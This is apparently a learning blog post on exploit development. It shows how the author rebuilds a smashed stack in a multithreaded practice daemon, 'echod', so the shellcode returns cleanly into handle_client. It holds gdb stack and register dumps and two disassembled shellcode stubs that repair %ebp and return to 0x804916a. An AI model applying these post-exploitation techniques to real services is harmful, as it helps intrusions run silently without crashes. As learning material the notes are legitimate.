Stack Rebuilding
Well, as for the "next target", I've selected visigoth's "fucktcpd". But that's another post. Right now I wanted to share a little about rebuilding echod's stack so it returned properly.
*) Start with the basics (I know nothing about this, so I'm feeling my way): Returning in the program
A quick backtrace from the "reverse_echo_cmd" sub (using the debugger gdb) shows that returning correctly should send the instruction pointer to 0x804916a.
Hmmmmm, I know that at the beginning of each sub is a
push %ebp
mov %esp,%ebp
and checking the contents of the stack show the address at %ebp+4, aka 0x4(%ebp):
13: x/32xw $ebp - 92
0xbfaedeec: 0x00000000 0x00000000 0x00000000 0x00000000
0xbfaedefc: 0x00000000 0x00000000 0x00000000 0x00000000
0xbfaedf0c: 0x00000000 0x00000000 0x00000000 0x00000000
0xbfaedf1c: 0x00000000 0x00000000 0x00000000 0x00000000
0xbfaedf2c: 0x00000000 0xbfaedf50 0x0804c6bb 0x0804c6bc
0xbfaedf3c: 0x00000000 0xbfaedfec 0x08054700 0xbfaedfb8
0xbfaedf4c: 0x0804916a 0x00000004 0x00000002 0xbfaedf70
0xbfaedf5c: 0x00000000 0x00000000 0x00000000 0x0804a748
(%ebp is in bold and 0x4(%ebp) is shown in italics)
We already knew this since that's the address we had to overwrite. We'll refer to this snippit later on as we clean up the stack.
So I set a breakpoint at the "leave" instruction for this sub. Then, allow the instruction to execute using "si".
I'm next left with the stack looking like this:
14: x/32xw $esp
0xbfaedf4c: 0x0804916a 0x00000004 0x00000002 0xbfaedf70
0xbfaedf5c: 0x00000000 0x00000000 0x00000000 0x0804a748
0xbfaedf6c: 0x00000002 0x0804a900 0x0804a904 0x00000000
0xbfaedf7c: 0x00000000 0x00000000 0x00000000 0x00000000
0xbfaedf8c: 0x00000000 0x00000000 0x00000000 0x00000000
0xbfaedf9c: 0x00000000 0x00000000 0xbfaedf70 0x0000007d
0xbfaedfac: 0x00000004 0x00000000 0x00000000 0xbfaedfd8
0xbfaedfbc: 0x2807faf1 0xbfbfecc4 0x00000000 0x00000000
13: x/32xw $ebp - 92
0xbfaedf5c: 0x00000000 0x00000000 0x00000000 0x0804a748
0xbfaedf6c: 0x00000002 0x0804a900 0x0804a904 0x00000000
0xbfaedf7c: 0x00000000 0x00000000 0x00000000 0x00000000
0xbfaedf8c: 0x00000000 0x00000000 0x00000000 0x00000000
0xbfaedf9c: 0x00000000 0x00000000 0xbfaedf70 0x0000007d
0xbfaedfac: 0x00000004 0x00000000 0x00000000 0xbfaedfd8
0xbfaedfbc: 0x2807faf1 0xbfbfecc4 0x00000000 0x00000000
0xbfaedfcc: 0x00000000 0x00000000 0x280964bc 0x00000000
(the top part shows the stack starting with %esp. the bottom views the stack so that %ebp is on the right side of the sixth row, or the third from the bottom. in case you can't tell, these are two of my favorite "display" settings in gdb)
Key point: See our favorite address at the very top of the stack. After poking around, the "leave" function reverses the beginning of the sub:
mov %ebp, %esp
pop %ebp
All that's left to do after that is to return to the calling function...
So, when we're done with the shellcode, we'll simply push 0x804916a and then ret... Let's try it:
push $0x804916a
ret
This did indeed return me into handle_client where we left off, but I get a segfault soon thereafter.
hmmm... it appears we have thrashed the stack, and must so some rebuilding.
Here's directly from my notes (forgive the laziness here, just want to include as much as possible and I've still got a lot of work and learning to do):
Learned:
returning back into the program is not hard... simply "push (ret address)" and "ret"
*) apparently, "leave" (executed directly before "ret") cleans up local variables and pops off %ebp kinda like this:
mov %ebp, %esp
mov 0x0(%ebp), %ebp
returning back into the program *correctly* is not so much... the stack must be in decent condition, and %ebp must be repaired...
*) While I'm able to overwrite %ebp with a typical value, the multitreading makes thiis part more difficult.
*) Instead, I'm trying the following approach within my shellcode:
14: 54 push %esp
15: 5d pop %ebp
16: 81 c5 a5 01 01 01 add $0x10101a4,%ebp # + A4, size of the stack for handle_client, the calling sub
1c: 81 ed 01 01 01 01 sub $0x1010101,%ebp #
22: 89 6d 01 mov %ebp,0x1(%ebp)
25: 83 45 01 30 addl $0x30,0x1(%ebp)
29: 45 inc %ebp
2a: 68 6a 91 04 08 push $0x804916a
2f: c3 ret
multithreaded app creates difficulties for both returning into shellcode as well as returning gracefully....
multithreading causes issues with ebp as well.
*) each thread has its own stack space. 0xbfaexxxx for one thread while 0xbfadxxxx for another
%ebp points to its previous location, making backtraces simple?
First off, let's compare a *normal* leave/ret stack with the smashed version....
(SPLOIT)
Breakpoint 2, 0x0804916a in handle_client ()
10: x/32xw $esp
0xbfaedf50: 0x00000005 0x00000002 0xbfaedf70 0x00000000
0xbfaedf60: 0x00000000 0x00000000 0x0804a748 0x00000002
0xbfaedf70: 0x0804a900 0x0804a904 0x00000000 0x00000000
0xbfaedf80: 0x00000000 0x00000000 0x00000000 0x00000000
0xbfaedf90: 0x00000000 0x00000000 0x00000000 0x00000000
0xbfaedfa0: 0x00000000 0xbfaedf70 0x00000425 0x00000005
0xbfaedfb0: 0x00000000 0xbfaedfd4 0xbfaedfd8 0x2807faf1
0xbfaedfc0: 0xbfbfecbc 0x00000000 0x00000000 0x00000000
9: x/32xw $ebp - 92
0xbfaedf58: 0xbfaedf70 0x00000000 0x00000000 0x00000000
0xbfaedf68: 0x0804a748 0x00000002 0x0804a900 0x0804a904
0xbfaedf78: 0x00000000 0x00000000 0x00000000 0x00000000
0xbfaedf88: 0x00000000 0x00000000 0x00000000 0x00000000
0xbfaedf98: 0x00000000 0x00000000 0x00000000 0xbfaedf70
0xbfaedfa8: 0x00000425 0x00000005 0x00000000 0xbfaedfd4
0xbfaedfb8: 0xbfaedfd8 0x2807faf1 0xbfbfecbc 0x00000000
0xbfaedfc8: 0x00000000 0x00000000 0x00000000 0x280964bc
8: /x $eax = 0x2
7: /x $ebx = 0x280964bc
6: /x $ecx = 0x1
5: /x $edx = 0x0
4: /x $edi = 0x8
3: /x $esi = 0xbfaedfec
2: /x $eflags = 0x286
1: x/i $pc 0x804916a <handle_client+206>: add $0x10,%esp
(gdb) ni
(GOOD)
Breakpoint 2, 0x0804916a in handle_client ()
10: x/32xw $esp
0xbfaedf50: 0x00000005 0x00000002 0xbfaedf70 0x00000000
0xbfaedf60: 0x00000000 0x00000000 0x0804a748 0x00000002
0xbfaedf70: 0x0804a900 0x0804a904 0x00000000 0x00000000
0xbfaedf80: 0x00000000 0x00000000 0x00000000 0x00000000
0xbfaedf90: 0x00000000 0x00000000 0x00000000 0x00000000
0xbfaedfa0: 0x00000000 0xbfaedf70 0x00000019 0x00000005
0xbfaedfb0: 0x00000000 0x00000000 0xbfaedfd8 0x2807faf1
0xbfaedfc0: 0xbfbfecbc 0x00000000 0x00000000 0x00000000
9: x/32xw $ebp - 92
0xbfaedf5c: 0x00000000 0x00000000 0x00000000 0x0804a748
0xbfaedf6c: 0x00000002 0x0804a900 0x0804a904 0x00000000
0xbfaedf7c: 0x00000000 0x00000000 0x00000000 0x00000000
0xbfaedf8c: 0x00000000 0x00000000 0x00000000 0x00000000
0xbfaedf9c: 0x00000000 0x00000000 0xbfaedf70 0x00000019
0xbfaedfac: 0x00000005 0x00000000 0x00000000 0xbfaedfd8
0xbfaedfbc: 0x2807faf1 0xbfbfecbc 0x00000000 0x00000000
0xbfaedfcc: 0x00000000 0x00000000 0x280964bc 0x00000000
8: /x $eax = 0x800
7: /x $ebx = 0x280964bc
6: /x $ecx = 0x804c100
5: /x $edx = 0x8054600
4: /x $edi = 0x8054700
3: /x $esi = 0xbfaedfec
2: /x $eflags = 0x282
1: x/i $pc 0x804916a : add $0x10,%esp
(gdb)
(pre-"REVERSE")
8: /x $eax = 0x8048f24
7: /x $ebx = 0x280964bc
6: /x $ecx = 0x2815f454
5: /x $edx = 0x0
4: /x $edi = 0x8054900
3: /x $esi = 0xbfaddfec
2: /x $eflags = 0x296
1: x/i $pc 0x8049168 : call *%eax
----------------------------(post-"REVERSE", normal input)
Breakpoint 2, 0x0804916a in handle_client ()
8: /x $eax = 0x800
7: /x $ebx = 0x280964bc
6: /x $ecx = 0x804c100
5: /x $edx = 0x8054600
4: /x $edi = 0x8054700
3: /x $esi = 0xbfaedfec
2: /x $eflags = 0x282
1: x/i $pc 0x804916a : add $0x10,%esp
----------------------------(post-"REVERSE", sploit)
Breakpoint 2, 0x0804916a in handle_client ()
8: /x $eax = 0x2
7: /x $ebx = 0xbfaddf08
6: /x $ecx = 0x1
5: /x $edx = 0x0
4: /x $edi = 0x9
3: /x $esi = 0xbfaddfec
2: /x $eflags = 0x286
1: x/i $pc 0x804916a : add $0x10,%esp
# PRE: 53 push %ebx
# 14: 83 c4 58 add $0x58,%esp (clean up esp)
# 15: 5b pop %ebx (clean up ebx for thread-kill)
# 17: 54 push %esp (clean up ebp)
# 18: 5d pop %ebp # "
# 19: 81 c5 68 01 01 01 add $0x1010168,%ebp # + A4 -1
# 1f: 81 ed 01 01 01 01 sub $0x1010101,%ebp # "
# 25: 89 6d 01 mov %ebp,0x1(%ebp) # "
# 27: 83 45 01 21 addl $0x21,0x1(%ebp) # "
# 2c: 45 inc %ebp (done cleaning up ebp)
# 2d: 68 6a 91 04 08 push $0x804916a (return into handle_client)
# 32: c3 ret (go!)
#